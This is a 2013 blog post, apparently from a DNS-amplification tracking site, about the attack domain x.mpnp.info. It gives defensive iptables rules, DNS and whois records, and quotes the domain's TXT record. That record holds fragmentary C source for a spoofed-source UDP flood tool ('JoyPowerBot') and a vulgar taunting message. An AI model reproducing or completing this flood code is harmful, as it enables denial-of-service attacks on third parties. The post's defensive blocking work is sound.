Thursday, November 14, 2013

Domain: x.mpnp.info

Domain: x.mpnp.info

Also seeing:

g.mpnp.info
j.mpnp.info
a.mpnp.info
z.mpnp.info


Another domain with a personalized message! I feel so special.

If you are seeing queries for this domain, than you are likely participating in DNS Amplification attacks and your DNS server is probably reachable from the internet and has recursion enabled.

If you are seeing responses for this domain.. unlucky. You are currently beeing DDOS-ed! Good luck.


IPtables:

Updated the below rule to match on any single char subdomain .mpnp.info:

There are two iptable rules available. If your distribution supports Iptables 'u32' module pick this one, otherwise use the 'string' rule.

U32:
iptables --insert INPUT -p udp --dport 53 -m u32 --u32 "0x28&0xFF00FFDF=0x0100044d && 0x2c&0xDFDFDFFF=0x504e5004 && 0x30&0xDFDFDFDF=0x494e464f && 0x34&0xFF000000=0x00000000" -j DROP -m comment --comment "DROP DNS Q x.mpnp.info"

More U32 rules can be found here:

https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist.txt

String:
iptables --insert INPUT -p udp --dport 53 -m string --from 42 --to 53 --algo bm --hex-string '|046d706e7004696e666f00|' -j DROP -m comment --comment "DROP DNS Q x.mpnp.info"
More Iptables rules for the STRING module can be found here:


https://github.com/smurfmonitor/dns-iptables-rules/blob/master/domain-blacklist-string.txt

Source:


No IP source for this domain

Name server:

mpnp.info.              86400   IN      NS      ns2.mpnp.info.
mpnp.info.              86400   IN      NS      ns1.mpnp.info.

ns1.mpnp.info.          86400   IN      A       149.3.143.130
ns2.mpnp.info.          77502   IN      A       149.3.143.130

Response:


TXT 1
Rsize 3948


"void attack(unsigned long srcip, int srcport, unsigned long destip, int destport, char *message){int s = socket (PF_INET, SOCK_RAW, IPPROTO_UDP)\;char packet[4096]\;structiphdr *iph = (struct iphdr *)packet\;structtcphd" ">" "struct sockaddr_in sin\;struct pseudo_header psh\;sin.sin_family = AF_INET\;sin.sin_port = htons(destport)\;sin.sin_addr.s_addr = destip\; memset (packet, 0, 4096)\;iph->ihl = 5\;iph->version = 4\;iph->tos = 16\;iph->tot_len = sizeof (struct ip) + sizeof (s" ">" "iph->id =                    htonl (54321)\; iph->frag_off = 0\;iph->ttl = 255\;iph->protocol = IPPROTO_UDP\;iph->check = 0\;iph->saddr = s rcip\;iph->daddr = sin.sin_addr.s_addr\;udph->source = htons(srcport)\;strncpy((char *)udph + sizeof (struct udphdr),message, 4096 - (si" ">" "void *thread_attack(void *thread_params){struct pthread_param *params = thread_params\;\009int i\;\009while (1)for (i = 0\; i < params->list_size\; i++)attack(params->victim_ip, rand() %65534 + 1, params->list[i].ip, params->list[i].port, params->message)\;" ">" "printf(Usage: %s <destip> <destport> <ip_file_list> <time in seconds> <message>/n, argv[0])\;if (argc != 6){printf(JoyPowerBot: %s <destip> <destport> <ip_file_list> <time in seconds> <message>/n, argv[0])\;return -1\;}srand(time(0))\;FILE *pFile =---- " ">" "param.list_size = list_size\;param.message = /xFF/xFF/xFF/xFF/x67/x65/x74/x73/x74/x61/x74/x75/x73/x10\;pthread_create( &udp_attack, NULL, thread_attack, (void*) &param)\;printf([*] Attacking../n)\;sleep(atoi(argv[4]))\;printf([!] Done/n)\;return 0\;------" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.       com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-d                     nsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">""dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsamplification.blogspot.com-dnsampli" ">" "GREATINGS:  ----FUKOFF FOR PAIN(QQ NOOB) I FUCKED UR MUM YESTERDAY.\;---- QQ DDOS-GUARD. WANNA SEE 300gbit?@24/7? I WILL SHOW U, CUZ U ARE ASSHOLES\;----  QQ dnsamplication, u are the best, ty man for this blog\;)*kissing* u are doing a good work.--- " ">" "8========================================================================                                                   ===================================================================================================>"


Well interesting...

Whois


Domain ID:D51006486-LRMS
Domain Name:MPNP.INFO
Created On:13-Nov-2013 16:04:31 UTC
Last Updated On:13-Nov-2013 16:22:32 UTC
Expiration Date:13-Nov-2014 16:04:31 UTC
Sponsoring Registrar:DomainContext Inc. (R524-LRMS)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Status:ADDPERIOD
Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Street1:ID#10760, PO Box 16
Registrant Street2:Note - Visit PrivacyProtect.org to contact the domain owner/operator
Registrant Street3:
Registrant City:Nobby Beach
Registrant State/Province:
Registrant Postal Code:QLD 4218
Registrant Country:AU
Registrant Phone:+45.36946676
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:contact@privacyprotect.org
Admin ID:PP-SP-001
Admin Name:Domain Admin
Admin Organization:PrivacyProtect.org
Admin Street1:ID#10760, PO Box 16
Admin Street2:Note - Visit PrivacyProtect.org to contact the domain owner/operator
Admin Street3:
Admin City:Nobby Beach
Admin State/Province:
Admin Postal Code:QLD 4218
Admin Country:AU
Admin Phone:+45.36946676
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:contact@privacyprotect.org
Billing ID:PP-SP-001
Billing Name:Domain Admin
Billing Organization:PrivacyProtect.org
Billing Street1:ID#10760, PO Box 16
Billing Street2:Note - Visit PrivacyProtect.org to contact the domain owner/operator
Billing Street3:
Billing City:Nobby Beach
Billing State/Province:
Billing Postal Code:QLD 4218
Billing Country:AU
Billing Phone:+45.36946676
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:contact@privacyprotect.org
Tech ID:PP-SP-001
Tech Name:Domain Admin
Tech Organization:PrivacyProtect.org
Tech Street1:ID#10760, PO Box 16
Tech Street2:Note - Visit PrivacyProtect.org to contact the domain owner/operator
Tech Street3:
Tech City:Nobby Beach
Tech State/Province:
Tech Postal Code:QLD 4218
Tech Country:AU
Tech Phone:+45.36946676
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:contact@privacyprotect.org
Name Server:NS1.MPNP.INFO
Name Server:NS2.MPNP.INFO
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server



2 comments: